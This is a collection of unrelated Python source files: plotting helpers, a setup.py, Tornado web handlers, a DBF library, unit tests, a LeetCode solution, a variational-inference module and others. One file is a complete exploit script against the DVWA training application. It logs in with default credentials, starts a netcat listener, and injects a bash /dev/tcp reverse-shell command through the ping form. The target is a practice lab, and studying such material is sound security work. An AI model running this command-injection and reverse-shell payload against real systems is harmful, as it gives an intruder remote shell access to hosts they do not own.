wspace = sep * height / avg_width_abs
hspace = sep * height / avg_height_abs
# Set up figure
fig = plt.figure(figsize=(width, height))
plt.subplots_adjust(
left=left * height / width,
right=1. - right * height / width,
bottom=bottom,
top=1. - top,
wspace=wspace,
hspace=hspace,
)
ax_left = plt.subplot(1,2,1)
ax_right = plt.subplot(1,2,2)
return fig, ax_left, ax_right
def animated_special(height=TEXTWIDTH*0.4, large_margin=0.18, mid_margin=0.14, small_margin=0.05, flipped=False):
# Geometry (in multiples of height)
left = large_margin
right = small_margin
top = small_margin
bottom = large_margin
panel_size = 1. - top - bottom
sep1 = small_margin + large_margin
sep2 = small_margin * 2
# Absolute width
width = height*(left + 3*panel_size + sep1 + sep2 + right)
# Set up figure
fig = plt.figure(figsize=(width, height))
if flipped:
left = small_margin
sep2 = small_margin + large_margin
# Two left axes
ax_left = fig.add_axes([(left + 2*panel_size + sep1 + sep2)*height/width, bottom, panel_size*height/width, panel_size])
ax_middle = fig.add_axes([(left + panel_size + sep1)*height/width, bottom, panel_size*height/width, panel_size])
# Space for images
images_left = left*height/width
images_bottom = bottom
images_width = panel_size*height/width
images_height = panel_size
else:
# Two left axes
ax_left = fig.add_axes([left*height/width, bottom, panel_size*height/width, panel_size])
ax_middle = fig.add_axes([(left + panel_size + sep1)*height/width, bottom, panel_size*height/width, panel_size])
# Space for images
images_left = (left + 2*panel_size + sep1 + sep2)*height/width
images_bottom = bottom
images_width = panel_size*height/width
images_height = panel_size
return fig, ax_left, ax_middle, (images_left, images_bottom, images_width, images_height)
def add_image_to_roster(fig, axes, total_coords, sep_fraction=0.08):
total_left, total_bottom, total_width, total_height = total_coords
n = len(axes)
rearrange_all = n in [int(x**2) for x in range(2,100)]
n_side = max(int(n**0.5) + 1, 2)
def _coords(i):
ix = i % n_side
iy = i // n_side
panel_width = total_width / (n_side + (n_side - 1) * sep_fraction)
left = total_left + ix * panel_width * (1.0 + sep_fraction)
width = panel_width
panel_height = total_height / (n_side + (n_side - 1) * sep_fraction)
bottom = total_bottom + (n_side - iy - 1) * panel_height * (1.0 + sep_fraction)
height = panel_height
return [left, bottom, width, height]
if rearrange_all:
axes_new = []
for i, ax in enumerate(axes):
axes_new.append(fig.add_axes(_coords(i)))
axes_new[-1].axis('off')
else:
axes_new = axes
axes_new.append(fig.add_axes(_coords(n)))
axes_new[-1].axis('off')
return axes_new
|
import os
from setuptools import setup, find_packages
def read(file):
return open(os.path.join(os.path.dirname(__file__), file)).read()
setup(
name="cdqa",
version="1.1.2b",
author="Félix MIKAELIAN, André FARIAS, Matyas AMROUCHE, Olivier SANS, Théo NAZON",
description="An End-To-End Closed Domain Question Answering System",
long_description=read("README.md"),
long_description_content_type="text/markdown",
keywords="reading comprehension question answering deep learning natural language processing information retrieval bert",
license="Apache-2.0",
url="https://github.com/cdqa-suite/cdQA",
packages=find_packages(),
install_requires=read("requirements.txt").split(),
)
|
from interface import Subject
"""
Notes:
- Setter is used to notify that changes have occurred
- Fields temperature, humidity, pressure are "private".
This means that we are preventing the alteration of any of
them without notification from their observers
- I have doubts about the presence of getters methods in this class.
- WheaterData represents a topic to subcribe containing
states that change.
"""
class WeatherData(Subject):
def __init__(self):
self.observers = []
# abstracts states that when modified
# will notify their subscribers
self._temperature = 0.0
self._humidity = 0.0
self._pressure = 0.0
def register_observer(self, observer):
self.observers.append(observer)
def remove_observer(self, observer):
self.observers.remove(observer)
def notify_observers(self):
for observer in self.observers:
observer.update(self._temperature, self._humidity, self._pressure)
def measurements_changed(self):
self.notify_observers()
def set_measurements(self, temperature, humidity, pressure):
self._temperature = temperature
self._humidity = humidity
self._pressure = pressure
self.measurements_changed()
def get_temperature(self):
return self._temperature
def get_humidity(self):
return self._humidity
def get_pressure(self):
return self._pressure
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Created by {{ cookiecutter.full_name }}
|
import tornado.web
from handlers.base_handler import BaseHandler
from models.group import Group
from models.user import User
from .util import check_group_permission
from forms.forms import GroupForm
class GroupsHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
group_name = self.get_argument('group_name', '')
groups = Group.search_name(group_name)
self.render('group/groups.html', groups=groups)
@tornado.web.authenticated
def post(self):
form = GroupForm(self.request.arguments)
if form.validate():
group = Group(**form.data)
user_id = self.get_current_user_id()
user = User.get(user_id)
user.groups.append(group)
group.save()
self.redirect(self.reverse_url('group', group.id))
else:
self.redirect(self.reverse_url('groups')) # Todo エラーメッセージを渡す
class GroupHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def get(self, group_id):
group = Group.get(group_id)
self.render('group/group.html', group=group)
class GroupEditHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def post(self, group_id):
form = GroupForm(self.request.arguments)
if form.validate():
group = Group.get(group_id)
group.update(**form.data)
group.save()
self.redirect(self.reverse_url('group', group_id))
else:
self.redirect(self.reverse_url('group', group_id))
class GroupDeleteHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def post(self, group_id):
Group.get(group_id).delete()
self.redirect(self.reverse_url('groups'))
class GroupMemberAdditionHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def get(self, group_id):
user_name = self.get_argument('user_name', '')
users = User.search_name(user_name)
users = [user for user in users if not user.belongs_to_group(group_id)]
group = Group.get(group_id)
self.render('group/member_addition.html', users=users, group=group)
@check_group_permission
@tornado.web.authenticated
def post(self, group_id):
user_id = self.get_argument('user_id', '')
user = User.get(user_id)
group = Group.get(group_id)
user.groups.append(group)
user.save()
self.redirect(self.reverse_url('member_addition', group_id))
class GroupUserHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def get(self, group_id):
group = Group.get(group_id)
self.render('group/group_users.html', group=group)
|
#! /usr/bin/env python
"""DBF accessing helpers.
FIXME: more documentation needed
Examples:
Create new table, setup structure, add records:
dbf = Dbf(filename, new=True)
dbf.addField(
("NAME", "C", 15),
("SURNAME", "C", 25),
("INITIALS", "C", 10),
("BIRTHDATE", "D"),
)
for (n, s, i, b) in (
("John", "Miller", "YC", (1980, 10, 11)),
("Andy", "Larkin", "", (1980, 4, 11)),
):
rec = dbf.newRecord()
rec["NAME"] = n
rec["SURNAME"] = s
rec["INITIALS"] = i
rec["BIRTHDATE"] = b
rec.store()
dbf.close()
Open existed dbf, read some data:
dbf = Dbf(filename, True)
for rec in dbf:
for fldName in dbf.fieldNames:
print '%s:\t %s (%s)' % (fldName, rec[fldName],
type(rec[fldName]))
print
dbf.close()
"""
"""History (most recent first):
11-feb-2007 [als] export INVALID_VALUE;
Dbf: added .ignoreErrors, .INVALID_VALUE
04-jul-2006 [als] added export declaration
20-dec-2005 [yc] removed fromStream and newDbf methods:
use argument of __init__ call must be used instead;
added class fields pointing to the header and
record classes.
17-dec-2005 [yc] split to several modules; reimplemented
13-dec-2005 [yc] adapted to the changes of the `strutil` module.
13-sep-2002 [als] support FoxPro Timestamp datatype
15-nov-1999 [jjk] documentation updates, add demo
24-aug-1998 [jjk] add some encodeValue methods (not tested), other tweaks
08-jun-1998 [jjk] fix problems, add more features
20-feb-1998 [jjk] fix problems, add more features
19-feb-1998 [jjk] add create/write capabilities
18-feb-1998 [jjk] from dbfload.py
"""
__version__ = "$Revision: 1.7 $"[11:-2]
__date__ = "$Date: 2007/02/11 09:23:13 $"[7:-2]
__author__ = "Jeff Kunce <kuncej@mail.conservation.state.mo.us>"
__all__ = ["Dbf"]
import header
import record
from utils import INVALID_VALUE
class Dbf(object):
"""DBF accessor.
FIXME:
docs and examples needed (dont' forget to tell
about problems adding new fields on the fly)
Implementation notes:
``_new`` field is used to indicate whether this is
a new data table. `addField` could be used only for
the new tables! If at least one record was appended
to the table it's structure couldn't be changed.
"""
__slots__ = ("name", "header", "stream",
"_changed", "_new", "_ignore_errors")
HeaderClass = header.DbfHeader
RecordClass = record.DbfRecord
INVALID_VALUE = INVALID_VALUE
## initialization and creation helpers
def __init__(self, f, readOnly=False, new=False, ignoreErrors=False):
"""Initialize instance.
Arguments:
f:
Filename or file-like object.
new:
True if new data table must be created. Assume
data table exists if this argument is False.
readOnly:
if ``f`` argument is a string file will
be opend in read-only mode; in other cases
this argument is ignored. This argument is ignored
even if ``new`` argument is True.
headerObj:
`header.DbfHeader` instance or None. If this argument
is None, new empty header will be used with the
all fields set by default.
ignoreErrors:
if set, failing field value conversion will return
``INVALID_VALUE`` instead of raising conversion error.
"""
if isinstance(f, basestring):
# a filename
self.name = f
if new:
# new table (table file must be
# created or opened and truncated)
self.stream = file(f, "w+b")
else:
# tabe file must exist
self.stream = file(f, ("r+b", "rb")[bool(readOnly)])
else:
# a stream
self.name = getattr(f, "name", "")
self.stream = f
if new:
# if this is a new table, header will be empty
self.header = self.HeaderClass()
else:
# or instantiated using stream
self.header = self.HeaderClass.fromStream(self.stream)
self.ignoreErrors = ignoreErrors
self._new = bool(new)
self._changed = False
## properties
closed = property(lambda self: self.stream.closed)
recordCount = property(lambda self: self.header.recordCount)
fieldNames = property(
lambda self: [_fld.name for _fld in self.header.fields])
fieldDefs = property(lambda self: self.header.fields)
changed = property(lambda self: self._changed or self.header.changed)
def ignoreErrors(self, value):
"""Update `ignoreErrors` flag on the header object and self"""
self.header.ignoreErrors = self._ignore_errors = bool(value)
ignoreErrors = property(
lambda self: self._ignore_errors,
ignoreErrors,
doc="""Error processing mode for DBF field value conversion
if set, failing field value conversion will return
``INVALID_VALUE`` instead of raising conversion error.
""")
## protected methods
def _fixIndex(self, index):
"""Return fixed index.
This method fails if index isn't a numeric object
(long or int). Or index isn't in a valid range
(less or equal to the number of records in the db).
If ``index`` is a negative number, it will be
treated as a negative indexes for list objects.
Return:
Return value is numeric object maning valid index.
"""
if not isinstance(index, (int, long)):
raise TypeError("Index must be a numeric object")
if index < 0:
# index from the right side
# fix it to the left-side index
index += len(self) + 1
if index >= len(self):
raise IndexError("Record index out of range")
return index
## iterface methods
def close(self):
self.flush()
self.stream.close()
def flush(self):
"""Flush data to the associated stream."""
if self.changed:
self.header.setCurrentDate()
self.header.write(self.stream)
self.stream.flush()
self._changed = False
def indexOfFieldName(self, name):
"""Index of field named ``name``."""
# FIXME: move this to header class
return self.header.fields.index(name)
def newRecord(self):
"""Return new record, which belong to this table."""
return self.RecordClass(self)
def append(self, record):
"""Append ``record`` to the database."""
record.index = self.header.recordCount
record._write()
self.header.recordCount += 1
self._changed = True
self._new = False
def addField(self, *defs):
"""Add field definitions.
For more information see `header.DbfHeader.addField`.
"""
if self._new:
self.header.addField(*defs)
else:
raise TypeError("At least one record was added, "
"structure can't be changed")
## 'magic' methods (representation and sequence interface)
def __repr__(self):
return "Dbf stream '%s'\n" % self.stream + repr(self.header)
def __len__(self):
"""Return number of records."""
return self.recordCount
def __getitem__(self, index):
"""Return `DbfRecord` instance."""
return self.RecordClass.fromStream(self, self._fixIndex(index))
def __setitem__(self, index, record):
"""Write `DbfRecord` instance to the stream."""
record.index = self._fixIndex(index)
record._write()
self._changed = True
self._new = False
#def __del__(self):
# """Flush stream upon deletion of the object."""
# self.flush()
def demoRead(filename):
_dbf = Dbf(filename, True)
for _rec in _dbf:
print
print repr(_rec)
_dbf.close()
def demoCreate(filename):
_dbf = Dbf(filename, new=True)
_dbf.addField(
("NAME", "C", 15),
("SURNAME", "C", 25),
("INITIALS", "C", 10),
("BIRTHDATE", "D"),
)
for (_n, _s, _i, _b) in (
("John", "Miller", "YC", (1981, 1, 2)),
("Andy", "Larkin", "AL", (1982, 3, 4)),
("Bill", "Clinth", "", (1983, 5, 6)),
("Bobb", "McNail", "", (1984, 7, 8)),
):
_rec = _dbf.newRecord()
_rec["NAME"] = _n
_rec["SURNAME"] = _s
_rec["INITIALS"] = _i
_rec["BIRTHDATE"] = _b
_rec.store()
print repr(_dbf)
_dbf.close()
if (__name__=='__main__'):
import sys
_name = len(sys.argv) > 1 and sys.argv[1] or "county.dbf"
demoCreate(_name)
demoRead(_name)
# vim: set et sw=4 sts=4 :
|
import matplotlib.pyplot as plt
class SignChangeSparseMap:
def __init__(self):
self.x_plus = []
self.x_minus = []
self.y_plus = []
self.y_minus = []
def add_right_change(self, x, y):
self.x_plus.append([x, y])
def add_left_change(self, x, y):
self.x_minus.append([x, y])
def add_up_change(self, x, y):
self.y_plus.append([x, y])
def add_down_change(self, x, y):
self.y_minus.append([x, y])
def to_dict(self):
return {
'__sign_change_sparse_map__': True,
'x_plus': self.x_plus,
'x_minus': self.x_minus,
'y_plus': self.y_plus,
'y_minus': self.y_minus,
}
@staticmethod
def from_dict(dict):
if '__sign_change_sparse_map__' not in dict:
raise RuntimeError('not a SignChangeSparseMap dict')
restored_sparse_map = SignChangeSparseMap()
restored_sparse_map.x_plus = dict['x_plus']
restored_sparse_map.x_minus = dict['x_minus']
restored_sparse_map.y_plus = dict['y_plus']
restored_sparse_map.y_minus = dict['y_minus']
return restored_sparse_map
def plot(self, save_path=""):
[xs, ys] = [[i for i, j in self.x_plus], [j for i, j in self.x_plus]]
plt.plot(xs, ys, 'y.')
[xs, ys] = [[i for i, j in self.x_minus], [j for i, j in self.x_minus]]
plt.plot(xs, ys, 'r.')
[xs, ys] = [[i for i, j in self.y_plus], [j for i, j in self.y_plus]]
plt.plot(xs, ys, 'g.')
[xs, ys] = [[i for i, j in self.y_minus], [j for i, j in self.y_minus]]
plt.plot(xs, ys, 'b.')
plt.xlabel('x')
plt.ylabel('y')
if save_path:
plt.savefig(save_path)
else:
plt.show()
|
#!/usr/bin/python3
import requests
import re
import sys
import subprocess
import shlex
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}
class Interface ():
def __init__ (self):
self.red = '\033[91m'
self.green = '\033[92m'
self.white = '\033[37m'
self.yellow = '\033[93m'
self.bold = '\033[1m'
self.end = '\033[0m'
def header(self):
print('\n >> DVWA - Remote Code Execution')
print(' >> by twseptian\n')
def info (self, message):
print(f"[{self.white}*{self.end}] {message}")
def warning (self, message):
print(f"[{self.yellow}!{self.end}] {message}")
def error (self, message):
print(f"[{self.red}x{self.end}] {message}")
def success (self, message):
print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")
# Instantiate our interface class
global output
output = Interface()
output.header()
security_level = "medium"
target_ip = '172.17.0.2' #change target ip
target_port = '80' #change target port
localhost = '172.17.0.1' #change localhost ip
localport = '4444' #change localport
url = 'http://'+target_ip+':'+target_port+'/login.php'
def csrf_token():
try:
# check request into url target
output.info("URL: %s/login.php" %target_ip)
r = requests.get(url, allow_redirects= False)
except:
output.error("\n[!] csrf_token: Failed to connect URL. \n[i] Quitting")
sys.exit(-1)
#Extract anti-csrf token
source = BeautifulSoup(r.text, "html.parser")
user_token = source("input", {"name": "user_token"})[0]["value"]
output.info("Grabbing user_token: %s"% user_token)
#Extract session information
session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
session_id = session_id.group(1)
output.info("Grabbing session_id: %s"%session_id)
return session_id, user_token
def login_to_dvwa(session_id, user_token):
#POST Data
global cookies
data = {"username": "admin", "password": "password", "Login":"Login","user_token": user_token}
cookies = {"PHPSESSID": session_id, "security": security_level}
headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0","Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5","Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded","Content-Length": "88"
}
try:
print("\n")
output.info("URL: %s/login.php" %target_ip)
output.info("Data: %s" %data)
output.info("Cookie: %s" %cookies)
r = requests.post(url, data=data, cookies=cookies, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
except:
output.error("Login failed, quiting")
sys.exit(-1)
if r.headers["Location"] != 'index.php':
output.error("Login failed")
exit()
output.success("Logged in Successfully")
return True
def command_injection():
output.warning("Command Injection to remote code execution")
payload = "127.0.0.1|/bin/bash -c 'bash -i >& /dev/tcp/"+localhost+"/"+localport+" 0>&1'"
data_input = {"ip": payload,"Submit": "Submit"}
listener = "nc -nvlp {}".format(localport)
args = shlex.split(listener)
subprocess.Popen(args)
output.warning("Take RCE\n")
input_ci = requests.post('http://'+target_ip+':'+target_port+'/vulnerabilities/exec/', cookies=cookies, data=data_input, proxies=proxies)
def main():
# Get initial CSRF token
session_id, user_token = csrf_token()
# Login to DVWA
login_to_dvwa(session_id, user_token)
# Trigger Command Injection,RCE
command_injection()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
|
"""
==============================================================================
Element unit tests
==============================================================================
@File : testElements.py
@Date : 2021/07/29
@Author : Alasdair Christison Gray
@Description :
"""
# ==============================================================================
# Standard Python modules
# ==============================================================================
import unittest
from parameterized import parameterized_class
# ==============================================================================
# External Python modules
# ==============================================================================
import numpy as np
# ==============================================================================
# Extension modules
# ==============================================================================
from FEMpy import QuadElement, Lagrange1dElement, serendipityQuadElement
# --- Elements to test: ---
# QuadElement: 1st to 4th order
# SerendipityQuad
# Lagrange1DElement: 1st to 4th order
test_params = []
for el in [Lagrange1dElement, QuadElement, serendipityQuadElement]:
if el in [QuadElement, Lagrange1dElement]:
for order in range(1, 5):
element = el(order=order)
test_params.append({"element": element, "name": element.name})
else:
element = el()
test_params.append({"element": element, "name": element.name})
@parameterized_class(test_params)
class ElementUnitTest(unittest.TestCase):
def setUp(self) -> None:
self.tol = 1e-10
self.numTestPoints = 4
np.random.seed(1)
def testGetParamCoord(self):
error = self.element.testGetParamCoord(self.numTestPoints, maxIter=400, tol=self.tol * 1e-3)
np.testing.assert_allclose(error, 0, atol=self.tol, rtol=self.tol)
def testShapeFunctionDerivatives(self):
error = self.element.testShapeFunctionDerivatives(self.numTestPoints)
np.testing.assert_allclose(error, 0, atol=self.tol, rtol=self.tol)
def testShapeFunctionSum(self):
sum = self.element.testShapeFunctionSum(self.numTestPoints)
np.testing.assert_allclose(sum, 1, atol=self.tol, rtol=self.tol)
if __name__ == "__main__":
unittest.main()
|
import logging
class LogConfigurator(object):
"""Console logging that can be configured by verbosity levels."""
def __init__(self, root=None, root_level=logging.INFO):
self.root = logging.getLogger() if root is None else root
self.root.setLevel(root_level)
self.__file_handler = None
self.__console_handler = None
@property
def console_handler(self):
if self.__console_handler is None:
self.__console_handler = logging.StreamHandler()
return self.__console_handler
def map_verbosity_to_level(self, value):
"""Verbosity value is just an integer count of v-char in `-vvvv`."""
return logging.CRITICAL - (value * 10) % logging.CRITICAL
def set_console_handler(self, verbosity):
self.console_handler.setLevel(self.map_verbosity_to_level(verbosity))
# if self.root.level < self.console_handler.level:
# self.root.level = self.console_handler.level
self.root.level = self.console_handler.level
format_str = '%(asctime)s %(name)-30s %(levelname)-8s %(message)s'
datefmt_str = '%m-%d %H:%M:%S'
self.console_handler.setFormatter(
logging.Formatter(format_str, datefmt_str))
self.root.addHandler(self.console_handler)
|
#-------------------------------------------------------------------------------
# Evaluate Division
#-------------------------------------------------------------------------------
# By Ying Peng
# https://leetcode.com/problems/evaluate-division/
# Completed 11/30/20
#-------------------------------------------------------------------------------
# Approach
#-------------------------------------------------------------------------------
"""
1. Create a directed weighted graph that takes all the values provided and their inverse
2. For each query, dfs to find whether path exists
"""
#-------------------------------------------------------------------------------
# Soluton
#-------------------------------------------------------------------------------
class Solution:
def _create_graph(self, equations, values):
self.graph = {}
for div, value in zip(equations, values):
if self.graph.get(div[0]) is None:
self.graph[div[0]] = [(div[1], value)]
else:
self.graph[div[0]].append((div[1], value))
if self.graph.get(div[1]) is None:
self.graph[div[1]] = [(div[0], 1 / value)]
else:
self.graph[div[1]].append((div[0], 1 / value))
def _dfs(self, start, goal, product, visited):
if self.graph.get(start) is None or self.graph.get(goal) is None or start in visited:
return -1
visited.append(start)
for neighbor, value in self.graph[start]:
print(neighbor, value)
if neighbor == goal:
return product * value
else:
product_updated = self._dfs(neighbor, goal, product * value, visited)
if product_updated != -1:
return product_updated
return -1
def calcEquation(self, equations: [[str]], values: [float], queries: [[str]]) -> [float]:
self._create_graph(equations, values)
res = []
for query in queries:
res.append(self._dfs(str(query[0]), str(query[1]), 1, []))
return res
#-------------------------------------------------------------------------------
# Unit Test
#-------------------------------------------------------------------------------
import unittest
class TestSolution(unittest.TestCase):
if __name__ == '__main__':
unittest.main()
|
import numpy as np
import math
def poisson_lambda_mle(d):
"""
Computes the Maximum Likelihood Estimate for a given 1D training
dataset from a Poisson distribution.
"""
return sum(d) / len(d)
def likelihood_poisson(x, lam):
"""
Computes the class-conditional probability for an univariate
Poisson distribution
"""
if x // 1 != x:
likelihood = 0
else:
likelihood = math.e**(-lam) * lam**(x) / math.factorial(x)
return likelihood
if __name__ == "__main__":
# Plot Probability Density Function
from matplotlib import pyplot as plt
training_data = [0, 1, 1, 3, 1, 0, 1, 2, 1, 2, 2, 1, 2, 0, 1, 4]
mle_poiss = poisson_lambda_mle(training_data)
true_param = 1.0
x_range = np.arange(0, 5, 0.1)
y_true = [likelihood_poisson(x, true_param) for x in x_range]
y_mle = [likelihood_poisson(x, mle_poiss) for x in x_range]
plt.figure(figsize=(10,8))
plt.plot(x_range, y_true, lw=2, alpha=0.5, linestyle='--', label='true parameter ($\lambda={}$)'.format(true_param))
plt.plot(x_range, y_mle, lw=2, alpha=0.5, label='MLE ($\lambda={}$)'.format(mle_poiss))
plt.title('Poisson probability density function for the true and estimated parameters')
plt.ylabel('p(x|theta)')
plt.xlim([-1,5])
plt.xlabel('random variable x')
plt.legend()
plt.show()
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2019 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from migrate.changeset import UniqueConstraint
from sqlalchemy import MetaData, Table
ENGINE = 'InnoDB'
CHARSET = 'utf8'
def upgrade(migrate_engine):
"""
This database upgrade drops the old unique constraint and creates
new unique constraint for the kube_app table.
"""
meta = MetaData()
meta.bind = migrate_engine
kube_app = Table('kube_app', meta, autoload=True)
UniqueConstraint('name', table=kube_app).drop()
UniqueConstraint('name', 'app_version', table=kube_app,
name='u_app_name_version').create()
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
# As per other openstack components, downgrade is
# unsupported in this release.
raise NotImplementedError('SysInv database downgrade is unsupported.')
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 19 19:29:07 2018
@author: yiyuezhuo
"""
'''
A relative gerneralized framework will be employed, such as apply common
distributions rather than meanfield or full-rank multivariate normal.
Pytorch 0.4 new features are required.
core3 move q_size from first dimention to last dimention to leverage broadcasting.
'''
import torch
import contextlib
# The two helper classes will be used to annotate what is parameters should
# be optimized
class Parameter(torch.Tensor):
def __new__(cls,*args,**kwargs):
kwargs['requires_grad'] = True
tensor = torch.tensor(*args,**kwargs)
tensor.__class__ = cls
return tensor
class Data(torch.Tensor):
'''
This class may be unnecessary.
'''
def __new__(cls,*args,**kwargs):
kwargs['requires_grad'] = False
tensor = torch.tensor(*args,**kwargs)
tensor.__class__ = cls
return tensor
def collect_variable_labeled_class(target_f,classes):
parameters_dict = {}
for key,value in target_f.__globals__.items():
if isinstance(value, classes):
parameters_dict[key] = value
return parameters_dict
def collect_parameters(target_f):
return collect_variable_labeled_class(target_f, Parameter)
def collect_parameter_datas(target_f):
return collect_variable_labeled_class(target_f, (Parameter,Data))
class VariationalMeanFieldDistribution:
def __init__(self,target_f, q_size=1):
self.target_f = target_f
self.q_size = 1
self.params = {}
for name,variable in collect_parameters(target_f).items():
param = dict(loc = variable,
omega = torch.zeros(variable.shape, requires_grad=True),
size = variable.shape + torch.Size([q_size]))
self.params[name] = param
def sample(self):
for name,param in self.params.items():
loc,scale,size = param['loc'],torch.exp(param['omega']),param['size']
noise = torch.distributions.Normal(0,1).sample(size)
_loc = loc.unsqueeze(-1).expand_as(noise)
_scale = scale.unsqueeze(-1).expand_as(noise)
self.target_f.__globals__[name] = noise * _scale + _loc
def parameters(self):
rl = []
for name,param in self.params.items():
rl.extend([param['loc'], param['omega']])
return rl
def log_prob(self):
logq = 0.0
for name,param in self.params.items():
shape = param['loc'].shape + (self.q_size,)
_loc = param['loc'].unsqueeze(-1).expand(shape)
_omega = param['omega'].unsqueeze(-1).expand(shape)
q_dis = torch.distributions.Normal(_loc, torch.exp(_omega))
q_log_prob = q_dis.log_prob(self.target_f.__globals__[name])
for i in range(len(self.params[name]['size'])-1):
q_log_prob = q_log_prob.sum(0)
logq += q_log_prob
return logq
@contextlib.contextmanager
def transform_meanfield(target_f, q_size = 1):
'''
Add q size dimention to all variables labeled Parameter and Data
in target_f.__globals__ with sample of variational distribution.
When exit, the state will be reset and variational parameter
loc value rewrite to original value. The other variational parameters,
can be collected in block.
'''
cache = collect_parameter_datas(target_f)
for name,variable in cache.items():
if isinstance(variable,Data):
extended = variable.unsqueeze(-1).expand(variable.shape + (q_size,))
target_f.__globals__[name] = Data(extended)
q_dis = VariationalMeanFieldDistribution(target_f, q_size = q_size)
yield q_dis
target_f.__globals__.update(cache)
def vb_meanfield(target_f, n_epoch = 100, lr=0.01, q_size = 1):
with transform_meanfield(target_f, q_size = q_size) as q_dis:
optimizer = torch.optim.SGD(q_dis.parameters(), lr=lr)
for i in range(n_epoch):
q_dis.sample()
logp = target_f()
logq = q_dis.log_prob()
target = logp.mean(0) - logq.mean(0) # reduce q_size dimention
loss = -target
optimizer.zero_grad()
loss.backward()
optimizer.step()
return q_dis # Though calling sample or other method may cause misleading.
# Maybe returning only trimed params is better choice?
def vb_fullrank(target_f, n_epoch = 100, lr=0.01, q_size = 1):
raise NotImplementedError
def sampling_hmc(target_f, leap_frog_step = 0.01, leap_frog_length = 20,
trace_length = 100):
pd = collect_parameters(target_f)
trace = []
potential_trace = []
def grad():
# zero_grad manually
for name in pd:
target_f.__globals__[name].grad = None
target = target_f()
target.backward()
return target
def get_potential(target, r):
#target = target_f()
potential = target.detach()
for name in pd:
#potential -= r[name] @ r[name]
potential -= 0.5 * torch.sum(r[name] * r[name])
# It's interesting to see torch.dot or @ does't support size 0 tensor
return potential
for trace_i in range(trace_length):
r = {}
for name in pd:
r[name] = torch.randn_like(target_f.__globals__[name])
trace.append({name: target_f.__globals__[name].detach() for name in pd})
potential_trace.append(get_potential(target_f(), r))
# leap-frog procedure
for frog_i in range(leap_frog_length):
grad()
for name in pd:
r[name] += (leap_frog_step/2) * target_f.__globals__[name].grad
theta = target_f.__globals__[name].detach() + leap_frog_step * r[name]
#print(r[name],theta)
target_f.__globals__[name] = Parameter(theta)
target = grad()
for name in pd:
r[name] += (leap_frog_step/2) * target_f.__globals__[name].grad
potential = get_potential(target, r)
log_accept = potential - potential_trace[-1]
#print(log_accept,potential,potential_trace[-1])
#print(log_accept)
if log_accept > 0 or (torch.rand(1) < torch.exp(log_accept)).item():
#print('accept',)
trace[-1] = {name: target_f.__globals__[name].detach() for name in pd}
potential_trace[-1] = potential
return trace
current_target_f = None
from functools import wraps
def cache_target_f(f):
@wraps(f)
def _f(target_f,*args,**kwargs):
global current_target_f
current_target_f = target_f
return f(target_f,*args,**kwargs)
return _f
@cache_target_f
def vb(target_f,method='meanfield', *args, **kwargs):
return globals()[f'vb_{method}'](target_f, *args, **kwargs)
@cache_target_f
def sampling(target_f,method='hmc',*args,**kwargs):
return globals()[f'sampling_{method}'](target_f,*args,**kwargs)
@cache_target_f
def optimizing(target_f, lr=0.01, n_epoch = 1000):
parameters_dict = collect_parameters(target_f)
optimizer = torch.optim.SGD(parameters_dict.values(), lr=lr)
for epoch in range(n_epoch):
optimizer.zero_grad()
target = target_f()
loss = -target
loss.backward()
optimizer.step()
def reset(target_f = None):
if target_f is None:
if current_target_f is None:
return
target_f = current_target_f
for name,variable in collect_parameters(target_f).items():
del target_f.__globals__[name]
|
"""
Copyright (C) 2020 Piek Solutions LLC
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import requests
import binascii
from codecs import getencoder
import time
def enforce_hex(addr):
if type(addr) == int and addr < 256:
return hex(addr).lstrip('0x')
elif type(addr) == str:
return addr.lstrip('0x')
else:
raise ValueError('addr must be hex string or int < 256')
def scanI2c(ip):
"""
scans devices on i2c bus
:return: list of hex string addresses present on i2c bus
"""
try:
req_url = 'http://' + ip + '/i2c/scan'
resp = requests.get(url=req_url)
return resp.content.decode('utf-8')
